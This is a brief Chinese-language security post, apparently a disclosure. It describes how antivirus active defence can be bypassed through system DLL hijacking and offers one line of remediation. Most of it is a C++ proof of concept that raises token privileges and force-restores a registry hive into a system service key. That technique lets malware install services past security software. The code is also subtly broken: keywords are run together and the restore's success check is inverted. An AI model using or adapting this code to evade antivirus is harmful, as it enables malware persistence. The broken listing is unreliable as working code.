一种绕过绝大多数杀毒软件的方法及修复
 |  | |
 |
杀毒软件在主动防御的时候过于依赖WFP,漏防了系统自身的文件,导致了恶意程序可能通过感染系统dll染过主动防御执行任意操作.
DllHijack POC代码:
BOOL EnableDebugPriv(LPCTSTR lpName) { BOOL bRet = FALSE; HANDLE hToken = NULL; TOKEN_PRIVILEGES tp; LUID luid; do { if(!OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES|TOKEN_QUERY,&hToken)) break; if(!LookupPrivilegeValue(NULL,lpName,&luid)) break; tp.PrivilegeCount = 1; tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; tp.Privileges[0].Luid = luid; bRet = AdjustTokenPrivileges(hToken,0,&tp,sizeof(TOKEN_PRIVILEGES),NULL,NULL); } while(FALSE); if(hToken != NULL) CloseHandle(hToken); returnbRet; } BOOL RestoreReg(HKEY hKey,LPCWSTR lpSubKey,TCHAR szFilePath[MAX_PATH]) { BOOL bRet = FALSE; HKEY hCur = NULL; do { if(!EnableDebugPriv(SE_RESTORE_NAME)) break; if(RegOpenKeyEx(hKey,lpSubKey,NULL,KEY_ALL_ACCESS,&hCur) != ERROR_SUCCESS && RegCreateKey(hKey,lpSubKey,&hCur) != ERROR_SUCCESS) break; if(RegRestoreKey(hCur,szFilePath,REG_FORCE_RESTORE) != ERROR_SUCCESS) bRet = TRUE; } while(FALSE); if(hCur) RegCloseKey(hCur); returnbRet; } BOOL CDllHijackApp::InitInstance() { CWinApp::InitInstance();
RestoreReg(HKEY_LOCAL_MACHINE,L"SYSTEM\\CurrentControlSet\\Services\\poc",L"C:\\poc.hiv"); returnTRUE; }
修复方案: 辅助WFP防护,校验文件 | |
 |  |